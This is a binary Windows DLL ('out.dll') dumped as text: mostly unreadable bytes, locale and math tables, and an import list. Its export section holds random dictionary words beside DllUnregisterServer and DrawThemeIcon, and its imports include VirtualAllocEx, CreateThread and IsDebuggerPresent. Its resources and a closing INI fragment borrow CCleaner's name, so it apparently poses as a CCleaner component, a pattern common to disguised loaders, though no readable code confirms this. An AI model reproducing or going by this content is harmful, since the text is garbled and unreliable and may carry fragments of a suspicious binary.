��}=m=@@ 8�λB�[�[���u+E6�G@����@      �               @                        ZM��$^�        ]�>�=�@        Z��7��abK����؝Z��@ �t���?��,����T��4s���ag�@Xp�M� @�D�$_���n}in ���)�M�@֐��@P(�* C�� ��mz<       @�E3�&�Կ                �I,+���        ��U&X>�?        �i�.��c4�����?�����?��N�T����j8�6��f*"!��?~w�"�?nJ�R���1 ��7!�|�GD|�?���?���*�a��}� Ũ��      �?ƼpAؒ�?                ���߿        E�D;��?        ��h7�rۿ��=���(��r�?�EV�w�?��У�׿�����0�SM`��? ��?3��?/��*2Կ5�6Y�z⿛Ʊ���?�G�e�?�4���%��KV�<      �?�r��H�?                Bp�VV�̿        Q9V�%�?        ]|=3ſ.���߿|��_P��?�%�����?ػZq\�� ,6��ڿ�5DKBӹ?�@IK��?�Xf��䵿v�����ӿ�'���?+�3���?2���y�ڿg��/�p�      �?7C���?                >S�Ŏ��        �6�	�Ӷ?        �'��P9����z�^3տ��
΂��?&1yA��?�(+_�R��m�Y�п�}�"��?�Ɵ�lW�?P),��H��,��b�ſ�����?@��?��?�c\5jӿ=��Mpm<      �?c��+���?                ��'Z4��        �e-CS�?        F������,��wʿ(F_�e��?�X2CQ��?	ُ�㈏��wT�¿�/V�W��?#�(�7�?��� L��hC!�߶�c�(��y?�-�˶?X1U��uɿ�?Y��.�      �?P��B�?                �_CN�?��        F�n<�t�?        u[�c����#�Xu���7�&�?�I�v�*�?��w�|u�!u$�8��"Y�Nu?-HF���?0[��d� cf>	棿����c?����?�-[��6�����N}X�      �?�]���݃?                �z�z�z{j a - J P   z h - C N   k o - K R   z h - T W   u k        8�   @�   H�   P�   `�   h�   p�   x�	   ��
   ��   ��   ��   ��   ��   ��   ��   ��   Ȃ   Ђ   ؂   ��   �   ��   ��    �   �   �   �    �   (�    0�!   8�"   {#   @�$   H�%   P�&   X�'   `�)   h�*   p�+   x�,   ��-   ��/   ��6   ��7   ��8   ��9   ��>   ��?   ��@   ȃA   ЃC   ؃D   ��F   �G   ��I   ��J    �K   �N   �O   �P    �V   (�W   0�Z   8�e   @�   H�  L�  X�  d�  {  p�  |�  ��  ��	  �O  ��  ��  ��  Ą  Є  ܄  �z  �z  �  �   �  �  �  $�  0�  <�  H�  T�  `�  l�   x�!  ��"  ��#  ��$  ��%  ��&  ��'  ̅)  ؅*  �+  ��,  ��-  �/   �2  ,�4  8�5  D�6  P�7  \�8  h�9  t�:  ��;  ��>  ��?  ��@  ��A  ��C  ȆD  ��E  �F  ��G  �I  �J  �K  (�L  4�N  @�O  L�P  X�R  d�V  p�W  |�Z  ��e  ��k  ��l  ���  ȇ  ԇ  �z  ��	  �
  ��  �  �  �  (�  4�  @�  X�,  d�;  |�>  ��C  ��k  ��  ��  Ȉ  Ԉ	  ��
  �  ��  �;  �k  (�  8�  D�  P�	  \�
  h�  t�  ��;  ��  ��  ��  ��	  ��
  ̉  ؉  �;  ��  �	  �
  $�  0�  <�;  T�  d�	  p�
  |�  ��;  ��   ��	   ��
   Ȋ;   Ԋ$  �	$  ��
$  ��;$  �(  �	(  $�
(  0�,  <�	,  H�
,  T�0  `�	0  l�
0  x�4  ��	4  ��
4  ��8  ��
8  ��<  ��
<  ̋@  ؋
@  �
D  ��
H  ��
L  �
P  �|   �|  0�a r     b g     c a     z h - C H S     c s     d a     d e     e l     e n     e s     f i     f r     h e     h u     i s     i t     j a     k o     n l     n o     p l     p t     r o     r u     h r     s k     s q     s v     t h     t r     u r     i d     b e     s l     e t     l v     l t     f a     v i     h y     a z     e u     m k     a f     k a     f o     h i     m s     k k     k y     s w     u z     t t     p a     g u     t a     t e     k n     m r     s a     m n     g l     k o k   s y r   d i v       a r - S A   b g - B G   c a - E S   c s - C Z   d a - D K   d e - D E   e l - G R   f i - F I   f r - F R   h e - I L   h u - H U   i s - I S   i t - I T   n l - N L   n b - N O   p l - P L   p t - B R   r o - R O   r u - R U   h r - H R   s k - S K   s q - A L   s v - S E   t h - T H   t r - T R   u r - P K   i d - I D   u k - U A   b e - B Y   s l - S I   e t - E E   l v - L V   l t - L T   f a - I R   v i - V N   h y - A M   a z - A Z - L a t n     e u - E S   m k - M K   t n - Z A   x h - Z A   z u - Z A   a f - Z A   k a - G E   f o - F O   h i - I N   m t - M T   s e - N O   m s - M Y   k k - K Z   k y - K G   s w - K E   u z - U Z - L a t n     t t - R U   b n - I N   p a - I N   g u - I N   t a - I N   t e - I N   k n - I N   m l - I N   m r - I N   s a - I N   m n - M N   c y - G B   g l - E S   k o k - I N     s y r - S Y     d i v - M V     q u z - B O     n s - Z A   m i - N Z   a r - I Q   d e - C H   e n - G B   e s - M X   f r - B E   i t - C H   n l - B E   n n - N O   p t - P T   s r - S P - L a t n     s v - F I   a z - A Z - C y r l     s e - S E   m s - B N   u z - U Z - C y r l     q u z - E C     a r - E G   z h - H K   d e - A T   e n - A U   e s - E S   f r - C A   s r - S P - C y r l     s e - F I   q u z - P E     a r - L Y   z h - S G   d e - L U   e n - C A   e s - G T   f r - C H   h r - B A   s m j - N O     a r - D Z   z h - M O   d e - L I   e n - N Z   e s - C R   f r - L U   b s - B A - L a t n     s m j - S E     a r - M A   e n - I E   e s - P A   f r - M C   s r - B A - L a t n     s m a - N O     a r - T N   e n - Z A   e s - D O   s r - B A - C y r l     s m a - S E     a r - O M   e n - J M   e s - V E   s m s - F I     a r - Y E   e n - C B   e s - C O   s m n - F I     a r - S Y   e n - B Z   e s - P E   a r - J O   e n - T T   e s - A R   a r - L B   e n - Z W   e s - E C   a r - K W   e n - P H   e s - C L   a r - A E   e s - U Y   a r - B H   e s - P Y   a r - Q A   e s - B O   e s - S V   e s - H N   e s - N I   e s - P R   z h - C H T     s r     H�B   ��,   X�q   8�    d��   p��   |��   ���   ���   ���   ���   ���   ē�   Г�   ܓ�   ��   ��C    ��   ��   ��   ��)   $��   <�k   @�!   T�c   @�   `�D   l�}   x��   H�   ��E   `�   ��G   ���   h�   ��H   p�   ���   ̔�   ؔI   ��   ��   @�A   ���   x�   �J   ��   ��   $��   0��   <��   H��   T��   `��   l��   x��   ���   ��K   ���   ���   ��	   ���   ���   ̕�   ؕ�   ��   ��   ���   ��   ��    ��   ,��   8��   D��   P��   \��   h��   t��   ���   ���   P�#   ��e   ��*   ��l   h�&   ��h   ��
   ��L   ��.   Ȗs   ��   Ԗ�   ���   ��   ��M   ��   ��   (�>   ��   ��7   (�   ��   4�N   ��/   @�t    �   L��   X�Z   ��   d�O   x�(   p�j   8�   |�a   ��   ��P   ��   ���   ��Q   ��   ��R   ��-   ��r   ��1   ėx   �:   З�   Ȃ   0�?   ܗ�   �S   ȃ2   ��y   `�%   �g   X�$   �f   ��   ��+   (�m   4��    �=   @��   �;   L��   ��0   X��   d�w   p�u   |�U   Ђ   ���   ��T   ���   ؂   ���   �6   ��~   ��   ĘV   �   ИW   ܘ�   ��   ���   ��   ��   �X   ��   $�Y   �<   0��   <��   H�v   T��   �   `�[   H�"   l�d   x��   ���   ���   ���   ���   ș�   �   ؙ\   0��   ��   ���   ��   ,��   �   D��   P�]   Ѓ3   \�z   8�@   h��   ��8   x��    �9   ���    �   ��^   ��n   (�   ��_   ��5   ��|   {    ��b   0�   ̚`   ؃4   ؚ�   �{   p�'   �i   �o    �   0��   @��   L��   X��   d��   p�F   |�p   a f - z a   a r - a e   a r - b h   a r - d z   a r - e g   a r - i q   a r - j o   a r - k w   a r - l b   a r - l y   a r - m a   a r - o m   a r - q a   a r - s a   a r - s y   a r - t n   a r - y e   a z - a z - c y r l     a z - a z - l a t n     b e - b y   b g - b g   b n - i n   b s - b a - l a t n     c a - e s   c s - c z   c y - g b   d a - d k   d e - a t   d e - c h   d e - d e   d e - l i   d e - l u   d i v - m v     e l - g r   e n - a u   e n - b z   e n - c a   e n - c b   e n - g b   e n - i e   e n - j m   e n - n z   e n - p h   e n - t t   e n - u s   e n - z a   e n - z w   e s - a r   e s - b o   e s - c l   e s - c o   e s - c r   e s - d o   e s - e c   e s - e s   e s - g t   e s - h n   e s - m x   e s - n i   e s - p a   e s - p e   e s - p r   e s - p y   e s - s v   e s - u y   e s - v e   e t - e e   e u - e s   f a - i r   f i - f i   f o - f o   f r - b e   f r - c a   f r - c h   f r - f r   f r - l u   f r - m c   g l - e s   g u - i n   h e - i l   h i - i n   h r - b a   h r - h r   h u - h u   h y - a m   i d - i d   i s - i s   i t - c h   i t - i t   j a - j p   k a - g e   k k - k z   k n - i n   k o k - i n     k o - k r   k y - k g   l t - l t   l v - l v   m i - n z   m k - m k   m l - i n   m n - m n   m r - i n   m s - b n   m s - m y   m t - m t   n b - n o   n l - b e   n l - n l   n n - n o   n s - z a   p a - i n   p l - p l   p t - b r   p t - p t   q u z - b o     q u z - e c     q u z - p e     r o - r o   r u - r u   s a - i n   s e - f i   s e - n o   s e - s e   s k - s k   s l - s i   s m a - n o     s m a - s e     s m j - n o     s m j - s e     s m n - f i     s m s - f i     s q - a l   s r - b a - c y r l     s r - b a - l a t n     s r - s p - c y r l     s r - s p - l a t n     s v - f i   s v - s e   s w - k e   s y r - s y     t a - i n   t e - i n   t h - t h   t n - z a   t r - t r   t t - r u   u k - u a   u r - p k   u z - u z - c y r l     u z - u z - l a t n     v i - v n   x h - z a   z h - c h s     z h - c h t     z h - c n   z h - h k   z h - m o   z h - s g   z h - t w   z u - z a           UUUUUUſ      ��?UUUUUU�?��*�l�l�V�4�V���>���>���m0_$@      8C  `a��=  `a��=  @T�!�?sp.�c;      `C      �<�������?       �      �?      ��������               ���5�h!����?5�h!����?      �?      @          �?5�h!���>@�������             ��      �@      �                    UUUUUUſ      ��?UUUUUU�?��*�l�l�V�4�V���>���>���m0_$@      8C  `a��=  `a��=  @T�!�?sp.�c;      `C      �<�������?       �      �?      �sqrt            ���m0_$@���m0_$@      xC      8C @DT�!�?  DT�!�? @gg��2�  LL#�F=J47ࢨ:Esp.��:�3gg��2=      �?  ������               �      `C      �<      �<      �        log10                 �?      �?3      3                      �                     �   �d   �d   �d   �d   `�   h�!   p�   �d   �d   x�   ��   �d   ��   ��    ��   ��   ��   ��   ��   ��   ��   ğ   ̟   ԟ"   ܟ#   ��$   �%   �&   �sinh    cosh    tanh    atan    atan2   sin cos tan ceil    floor   fabs    modf    ldexp   _cabs   _hypot  fmod    frexp   _y0 _y1 _yn _logb   _nextafter         �D        � 0  C O N O U T $               ������ ������      ��?     ��?������B������B   ����   ���� x�PD�?X�1�=        ����������������              �?      �?                      0C      0C      ��      �     �     ��Η��5@=�)d	��U�5j��%��5��j�?��~��@5�w��z�A.�lzZ?               ��       ���ܧ׹�fq�@      ��@�6C����?      �?exp          �I  K            ��������       �                          �
�|?�Q-8>=  ޶�W�?0��	k8= ��ޮp�?�x�9=  >�.ښ?pn��5= �Y�ح�?�  	Q*=  c����??���b6= ��Y�?�T�?�=  ��>�?����W�!= @�-32�?D���z= ��p(�?vP�(��= `����?�US?�>= �e��?�g���7= `ŀ'��?�bͬ�/= ��^s�?�}�#��= �J�wk�?zn��= ��Nָ?�LN�� 9= @$"�3�?5Wg4p�6= ��T���?�Nv$^)= ��&�?��.�)��< �l��B�?�M���%= `j���?�w����*=  <śm�?E��2=  ެ>�?����E�= �t?��?����= �O�Q�?�w(@	��< ��0��?Ac��0= Pyp��?dry?�= ��St)�?4K��	�>= ���$��?Qh�BC .= 0	ub�?-����0=  ���?a>-�?=  ����?Й��,��<  (lX �?�T@b� == P����?�3�h,%= ��f�?�?�#���� = �V��?ߠϡ��6= ����Y�?���z $= ��G��? $�l35= @��n�?[+���3= �Rŷ �?s�dLi�== p�|��?r�x"#�2= @.���?|�U��2=  lԝ��?r��F�= �a��?����4= ��Y��?sl׼#{ = `~R=�?�.�i�1= ��,��?���� = ��vX�? ���= p����?h���}s"= �	E[
�?%S#[k= ��7�H�?����j= �!V1��?��}�a2= �jq��?2�0�J�5= ������?����5= x¾/@�?��"B <1= �i�z�?�\-!y�!= X�0z��?~��b>�== �:���?�#.X'= HBO&�?��(~= x�bb�?.�= �C�q��?y7��i9+= �v���?����:= 0����?2ض��8= x�PD�?X�1�=     ��?     ��?     Q�?     Q�?    ���?    ���?    ���?    ���?    ��?    ��?    ���?    ���?    �]�?    �]�?    P�?    P�?     ��?     ��?    �U�?    �U�?    (��?    (��?    `��?    `��?    �_�?    �_�?    ��?    ��?    ���?    ���?    �z�?    �z�?    �1�?    �1�?    p��?    p��?    ��?    ��?    (e�?    (e�?    @#�?    @#�?    ���?    ���?    `��?    `��?    hk�?    hk�?    �,�?    �,�?    x��?    x��?    ���?    ���?     ��?     ��?    �N�?    �N�?    x�?    x�?    p��?    p��?    ��?    ��?    �~�?    �~�?    HN�?    HN�?    ��?    ��?    ���?    ���?    ���?    ���?    p��?    p��?    Xi�?    Xi�?    �?�?    �?�?    ��?    ��?     ��?     ��?    ���?    ���?    8��?    8��?    s�?    s�?    pI�?    pI�?    �&�?    �&�?    � �?    � �?    ��?    ��?    �o�?    �o�?     *�?     *�?    ���?    ���?    `��?    `��?     Z�?     Z�?    ��?    ��?    0��?    0��?    ���?    ���?    PY�?    PY�?    ��?    ��?    `��?    `��?    ��?    ��?    pm�?    pm�?     /�?     /�?    ���?    ���?     ��?     ��?      �?          �O   _����    >ٍc                   �                                                           ��d�   h�                                                                                   ԭ                    h�                                                                        4��           $�,�    4�        ����    @   �            �\�           l�x�,�    �       ����    @   \�            ����           ��ȫx�,�    ��       ����    @   ��            P���           ��,�    P�       ����    @   ��            p�D�           T�d��,�    p�       ����    @   D�            ����           �����,�    ��       ����    @   ��            ���           ����    ��        ����    @   �            ��,�           <�H�,�    ��       ����    @   ,�sH I `b �u @T PT mT �T CW �W �W X W\ }\ �\ C] �_ �a �d �e g Jh Vh sh �h �h �h �h    ��        �       �& @T    i �                      �����T"�   �                       "�                               "�
   ��                       ����PW    XW    `W    hW    pW    xW    �W    �W    �W    �W"�>    �                       �����T    �T    �T    �T    �T    �T    �T    �T    �T    �T    U    U    U    #U    .U    9U    DU    OU    ZU    eU    pU    {U    �U    �U    �U    �U    �U    �U    �U    �U    �U    �U    �U    �U    
V    V     V    +V    6V    AV    LV    WV    bV    mV    xV    �V    �V    �V    �V    �V    �V    �V    �V    �V    �V    �V    �V    W    W    W    (W    3W@           � ����    ����                  �"�    �   �               ����`T"�   H�                           p#     ��   ����̱    ��    ����       �!    �    ����       �!     4�    ����        " �����W"�   �                       ����p\"�   �                       "�   d�                       ���� ]    ]    ]    ]     ]    (]    3]"�	   ��                       �����\    �\    �\    �\    �\    �\    �\    �\    �\"�a   ,�                       ����0X    8X    @X    HX    SX    ^X    iX    tX    X    �X    �X    �X    �X    �X    �X    �X    �X    �X    �X    �X    Y    Y    Y    $Y    /Y    :Y    EY    PY    [Y    fY    qY    |Y    �Y    �Y    �Y    �Y    �Y    �Y    �Y    �Y    �Y    �Y    �Y     Z    Z    Z    !Z    ,Z    7Z    BZ    MZ    XZ    cZ    nZ    yZ    �Z    �Z    �Z    �Z    �Z    �Z    �Z    �Z    �Z    �Z    �Z    �Z    [    [    [    )[    4[    ?[    J[    U[    `[    k[    v[    �[    �[    �[    �[    �[    �[    �[    �[    �[    �[    �[    �[    \    \    \    &\    1\    <\    G\"�   X�                       �����W    �W    �W    �W     X    X"�(   ��                       �����_    �_   �_   �_   	`   `   `   *`   5`   @`	   K`
   V`   a`   l`   w`   �`   �`   �`   �`   �`   �`   �`   �`   �`   �`   �`   �`   a   a   a   'a   2a   =a    Ha!   Sa"   ^a#   ia$   ta%   a&   �a"�   �                       ����f    f   &f   .f   6f   >f   Ff   Qf   \f   gf	   rf
   }f   �f   �f   �f   �f   �f   �f   �f   �f   �f   �f   �f   g   g"�    ��                       �����d    �d   �d   �d   �d   �d   �d   �d   �d   �d   �d
   	e   e   e   *e   5e   @e   Ke   Ve   ae   le   we   �e   �e   �e   �e   �e   �e   �e   �e   �e   �e"�:    �                       ����P]    []   f]   q]   |]   �]   �]   �]   �]   �]	   �]
   �]   �]   �]   �]   �]    ^   ^   ^   !^   ,^   7^   B^   M^   X^   c^   n^   y^   �^   �^   �^   �^   �^    �^!   �^"   �^#   �^$   �^   �^&   �^'   _(   _)   _*   )_+   4_,   ?_-   J_.   U_/   `_0   k_1   v_2   �_3   �_4   �_5   �_6   �_   �_8   �_"�   �                       ����0g    ;g   Fg   Ng   Yg   ag   ig   tg   g   �g	   �g   �g   �g   �g   �g   �g   �g   �g   �g   �g   h   h   h   $h   /h   :h"�B   �                       �����a    �a   �a   �a   �a   �a   �a   �a   �a   
b	   b
    b   +b   6b   Ab   Lb   Wb   bb   mb   xb   �b   �b   �b   �b   �b   �b   �b   �b   �b   �b   �b   �b   c   c!   c"   (c#   3c$   >c%   Ic&   Tc'   _c(   jc)   uc*   �c+   �c,   �c-   �c.   �c/   �c0   �c1   �c2   �c3   �c4   �c5   �c6   d7   d8   d9   %d:   0d;   ;d<   Fd   Qd>   \d?   gd@   rd    P#     (�   ��̱    P�    ����       g7    �7    `�   p�4�̱    p�    ����       -7    �7    ��   ��4�̱    ��    ����       �7����    ����    �����:�:    ����    ����    ����    =    ����    ����    ����    �=        �=����    ����    �����>�>    ����    ����    ����d,d    ����    ����    ����    Ts    ss����    ����    ����    fq    �p�p@           r����    ����                  ��"�   ��   ��               ����    ����    ����&h*h    ����    ����    �����h�h    �7    d�   p�̱    ��    ����       �o    ����    ����    ����    ������ee"�   ��                       ����    ����    ��������    ����    ����    ����    ������ee����ee"�   �                       ����ee"�   H�                           ����    ����    ����    ?�    ����    ����    ����    ��    ����    ����    ��������    ����    ����    ����    ��    ����    ����    ����    ��    ����    ����    ����    �    ����    ����    ����    X�    ����    ����    ����    	�    ����    ����    ����    ��    ����    ����    ����    ��    ����    ����    ����    ��    ����    ����    ����    <    ����    ����    ����    ��    ����    ����    ����    �    ����    ����    ����    1    ����    ����    ����    u
    ����    ����    ����    �$    ����    ����    ����    a&    ����    ����    ����    ]/    ����    ����    ����    E2    ����    ����    ����    7    ����    ����    ����    �E    ����    ����    ����Q,Q                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ����    ��          �� �� �� ��  ��  ��  � � � �- �� �� �� � � �  �         out.dll DllUnregisterServer DrawThemeIcon aldhafara breastheight marmorean soniou vag                                                                                                                                                                                                                             $� <� L� Z� l� ~� �� �� �� �� �� �� � "� .� :� P� B� .� � � �� �� �� �� � ,� @� \� z� �� �� �� �� �� �� �  � 0� @� P� h� �� �� �� �� �� �� ��  � � $� 2� H� ^� j� v� �� �� �� �� �� �� �� �� � � � 0� F� `� z� �� �� �� �� ^�     �� �� �� �  ��� ��     d� T� �� v�     �B��         F�  � �         �� T� ��         � 8�                     $� <� L� Z� l� ~� �� �� �� �� �� �� � "� .� :� P� B� .� � � �� �� �� �� � ,� @� \� z� �� �� �� �� �� �� �  � 0� @� P� h� �� �� �� �� �� �� ��  � � $� 2� H� ^� j� v� �� �� �� �� �� �� �� �� � � � 0� F� `� z� �� �� �� �� ^�     �� �� �� �  ��� ��     d� T� �� v�     �WaitForSingleObjectEx � CreateThread  kExitThread  GetTickCount64  �VirtualAllocEx  �GetCommandLineA MGetFileAttributesA  $GetCurrentProcess %GetCurrentProcessId (GetCurrentThread  )GetCurrentThreadId  �GetModuleHandleA  �GetModuleHandleW  IlstrcmpA  LlstrcmpiA UlstrlenA  KERNEL32.dll  SendMessageA  � DialogBoxParamA � EndDialog FindWindowA USER32.dll  G PathFileExistsA J PathFindExtensionA  P PathFindOnPathA R PathFindSuffixArrayA  X PathGetDriveNumberA SHLWAPI.dll �IsProcessorFeaturePresent �IsDebuggerPresent �UnhandledExceptionFilter  �SetUnhandledExceptionFilter �GetStartupInfoW aQueryPerformanceCounter �GetSystemTimeAsFileTime xInitializeSListHead �TerminateProcess  wRaiseException  �RtlUnwind �InterlockedFlushSList nGetLastError  HSetLastError  9EncodePointer =EnterCriticalSection  �LeaveCriticalSection  DeleteCriticalSection tInitializeCriticalSectionAndSpinCount �TlsAlloc  �TlsGetValue �TlsSetValue �TlsFree �FreeLibrary �GetProcAddress  �LoadLibraryExW  jExitProcess �GetModuleHandleExW  �GetModuleFileNameW  ^HeapFree  ZHeapAlloc MultiByteToWideChar �LCMapStringW  �MoveFileExW DecodePointer �FindClose �FindFirstFileExW  �FindNextFileW �IsValidCodePage �GetACP  �GetOEMCP  �GetCPInfo �GetCommandLineW WideCharToMultiByte DGetEnvironmentStringsW  �FreeEnvironmentStringsW �GetProcessHeap  �GetStdHandle  [GetFileType �GetStringTypeW  cHeapSize  aHeapReAlloc cSetStdHandle  �FlushFileBuffers  ,WriteFile GetConsoleOutputCP  GetConsoleMode  9SetFilePointerEx  � CreateFileW � CloseHandle +WriteConsoleW                                                                                                                                                               	 X3 �h  �|3 �8 �   ` �   � �     �   p �    �	   � �    	 �   @	 �   X	 �             8 x  x	 �y  �	 �z  �	 �{  �	 �|  �	 �}  �	 �~  
 �   
 ��  8
 ��  P
 ��  h
 ��  �
 ��  �
 ��  �
 ��  �
 ��  �
 ��  �
 ��   ��  ( ��  @ ��  X ��  p ��  � ��  � ��  � ��  � ��  � ��    ��   ��  0 ��  H ��  ` ��  x ��  � ��  � ��  � ��  � ��  � ��   ��    ��  8 ��  P ��  h ��  � ��  � ��  � ��  � ��  � ��  � ��   ��  ( ��  @ ��  X ��  p ��  � ��  � �                � �  � �  � �             ) �     ��    ��   0 ��   H ��   ` ��   x ��   � ��   � ��   � ��   � ��   � ��    ��     ��   8 ��   P ��   h ��   � ��   � ��   � ��   � ��   � ��   � ��    ��   ( �   @ �  X �  p �  � �  � �  � �  � �  � �	    �   �  0 �  H �  ` ��  x ��  � ��  � ��  � �                 � �   � �    �     �   8 �   P �   h �   � �	   � �
   � �   � �             �3 �� ��3 �� ��3 � �4 �( �:4 �@ �`4 �X �  p �  � �             Q �   � ��   � ��   � ��   � ��     ��    ��   0 ��   H ��   ` ��   x ��   � ��   � ��   � ��   � ��   � ��    ��     �  8 �  P �  h �  � �  � �  � �  � �x  � �y  � �z   �{  ( �|  @ �}  X �~  p �  � ��  � ��  � ��  � ��  � ��    ��   ��  0 ��  H ��  ` ��  x ��  � ��  � ��  � ��  � ��  � ��   ��    ��  8 ��  P ��  h ��  � ��  � ��  � ��  � ��  � ��  � ��   ��  ( ��  @ ��  X ��  p ��  � ��  � ��  � ��  � ��  � ��    ��   ��  0 ��  H ��  ` ��  x ��  � ��  � ��  � ��  � ��  � ��   ��    �             :    8 �   P �   h �	   � �
   � �   � �   � �   � �   � �    �   ( �   @ �   X �   p �   � �    � �&   � �,   � �-   � �?     �B    �C   0 �L   H �R   ` �X   x �Y   � �Z   � �^   � �_   � �e   � �f    �g     �k   8 �~   P ��   h ��   � ��   � ��   � ��   � ��   � ��   � ��     ��   (  ��   @  ��   X  ��   p  ��   �  ��   �  ��   �  ��   �  ��   �  ��    ! ��   ! ��   0! ��   H! ��   `! ��   x! ��   �! �              �   �! �              �   �! ��   �! �  �! �  " �   " �  8" �                 P" �                 h" �   �" �                �"                  �"                  �"                  �"                  �"                  �"                  �"                  #                  #                  (#                  8#                  H#                  X#                  h#                  x#                  �#                  �#                  �#                  �#                  �#                  �#                  �#                  �#                  $                  $                  ($                  8$                  H$                  X$                  h$                  x$                  �$                  �$                  �$                  �$                  �$                  �$                  �$                  �$                  %                  %                  (%                  8%                  H%                  X%                  h%                  x%                  �%                  �%                  �%                  �%                  �%                  �%                  �%                  �%                  &                    &                    (&                    8&                    H&                    X&                    h&                    x&                    �&                    �&                    �&                    �&                    �&                    �&                    �&                    �&                    '                    '                    ('                    8'                    H'                    X'                    h'                    x'                    �'                    �'                    �'                    �'                    �'                    �'                    �'                    �'                    (                    (                    ((                    8(                    H(                    X(                    h(                    x(                    �(                    �(                    �(                    �(                    �(                    �(                    �(                    �(                    )                    )                    ()                    8)                    H)                    X)                    h)                    x)                    �)                    �)                    �)                    �)                    �)                    �)                    �)                    �)                    *                    *                    (*                    8*                    H*                    X*                    h*                    x*                    �*                    �*                    �*                    �*                    �*                    �*                    �*                    �*                    +                    +                    (+                    8+                    H+                    X+                    h+                    x+                  �+                  �+                  �+                  �+                  �+                  �+                  �+                  �+                  ,                  ,                  (,                  8,                  H,                  X,                  h,                  x,                  �,                  �,                  �,                  �,                  �,                  �,                  �,                  �,                  -                  -                  (-                  8-                  H-                  X-                  h-                  x-                  �-                  �-                  �-                  �-                  �-                  �-                  �-                  �-                  .                  .                  (.                  8.                  H.                  X.                  h.                  x.                  �.                  �.                  �.                  �.                  �.                  �.                  �.                  �.                    /                    /                    (/                    8/                    H/                    X/                    h/                    x/                    �/                    �/                    �/                    �/                    �/                    �/                    �/                    �/                    0                    0                    (0                    80                    H0                    X0                    h0                    x0                    �0                    �0                    �0                    �0                    �0                    �0                    �0                    �0                    1                    1                    (1                    81                    H1                    X1                    h1                    x1                    �1                    �1                    �1                    �1                    �1                    �1                    �1                    �1                    2                    2                    (2                    82                    H2                    X2                    h2                    x2                    �2                    �2                    �2                    �2                    �2                    �2                    �2                    �2                    3                    3                    (3                    83                	  H3  �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �      �$    �       %    �      %    �      %    �      %    �      %    �      %    �      %    �      %    �       %    �      $%    �      (%    �      ,%    �      0%    �      4%    �      8%    �      <%    �      @%    �      D%    �      H%    �      L%    �      P%    �      T%    �      X%    �      \%    �      `%    �      d%    �      h%    �      l%    �      p%    �      t% �  �      �D �  �      �J ��  �      $  �(  �      ) �   �      �) �   �      T* �   �      �* �   �      �+ �   �      4, �   �      �, �   �      t- �   �      . �   �      �. �   �      T/ �   �      �/ �   �      �0 �   �      41 �   �      �1 �   �      t2 �   �      3 �   �      �3 �   �      T4 �   �      �4 �   �      �5 �   �      46 �   �      �6 �   �      t7 �   �      8 �(  �      a  2  �      � ($  �      ,� ($  �      T� 8  �      �� H  �      �� ($  �      � ($  �      $C (  �      L[ (  �      t^ (  �      �a (  �      �d (,  �      � (  �      � (  �      <� (  �      d� �  �      � h  �      t� �  �      df	 �%  �      �	 �  �      ��	 h  �      �	 h  �      ��	 h  �      �	 h  �      T�	 h  �      ��	 h  �      $�	 �   �      Է	 ^   �      4�	 <  �      p�	 `   �      й	 �   �      ��	 �   �      t�	 �   �      4�	 �   �      �	 @  �      $�	 �  �      ��	 <  �      (�	 �  �      ��	 �  �      ��	 �  �      @�	 �   �      4�	 h  �      ��	 �  �      <�	 �  �      �	 �  �      ��	   �      ��	 T   �      D�	    �      D�	 �  �      ��	 �   �      ��	 �  �      ��	 p   �      �	 �  �      ��	 �   �      ��	 �  �      ��	 �   �      ��	 <  �      ��	 |  �      D�	 �   �      ��	 �   �      |�	 �   �      �	 �   �      ��	 �   �      P�	 �   �      ��	 �   �      ��	 �   �      $�	 �   �      ��	 �   �      \�	 �   �      ��	 �   �      ��	 �   �      0�	 �   �      ��	 �   �      h�	 �   �      �	 �   �      ��	 �   �      <�	 �   �      ��	 �   �      t�	 �   �      �	 �   �      ��	 �   �      H�	 �   �      ��	 �   �      ��	 �   �      �	 �   �      ��	 �   �      T�	 �   �      ��	 �   �      ��	 �   �      (�	 �   �      ��	 �   �      `�	 �   �      ��	 �   �      ��	 �   �      4�	 �   �      ��	 �   �      l�	 �   �       
 �   �      � 
 �   �      @
 �   �      �
 �   �      x
 �   �      
 �   �      �
 �   �      L
 �   �      �
 �   �      �
 �   �       
 �   �      �
 �   �      X
 �   �      �
 �   �      �
 �   �      ,	
 �   �      �	
 �   �      d

 <  �      �
 f   �      
 F  �      P
 X   �      �
 �   �      x
 
  �      �
 �   �      @
   �      D
 d   �      �
 �   �      4
 �   �      �
   �      �
 $  �      
 .   �      8
 @   �      x
 �   �      \
 �  �      @
 N   �      �
 T   �      �
 �   �      �
 .   �       
 0   �      < 
 �   �      � 
 �   �      \!
   �      p$
 2  �      �&
 �  �      D*
 x  �      �+
 0  �      �,
 ,   �      -
 z  �      �0
 �  �      `2
 P  �      �3
 �   �      d4
 f   �      �4
 �   �      P5
 �   �      �5
 L  �       8
 t  �      �9
 �   �      (:
 F   �      p:
 �   �      l;
 ~   �      �;
 \   �      H<
 t   �      �<
 l   �      (=
 �   �      �=
 8  �      $@
 R  �      xA
 �   �      DB
 �  �      �F
 `   �      8G
 �  �       I
 �  �       K
 T  �      TL
 r  �      �R
 
  �      �\
   �      �]
 f   �      <^
 p   �      �^
 Z   �      _
    �      _
    �      0_
    �      D_
    �      X_
    �      l_
   �      �b
 �  �      Le
 }  �       A F X _ D I A L O G _ L A Y O U T  I N I  I D R _ M E N U _ C L E A N E R _ R U L E _ T R E E  I D R _ M E N U _ C U S T O M _ S C R E E N  I D R _ M E N U _ R E G I S T R Y _ I S S U E  I D R _ M E N U _ S T A R T U P  I D R _ M E N U _ U N I N S T A L L  I D R _ M E N U _ V I R T U A L _ C L E A N E R     PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA  PA; CCleaner - System Cleaning file

[Global]
Revision=2016
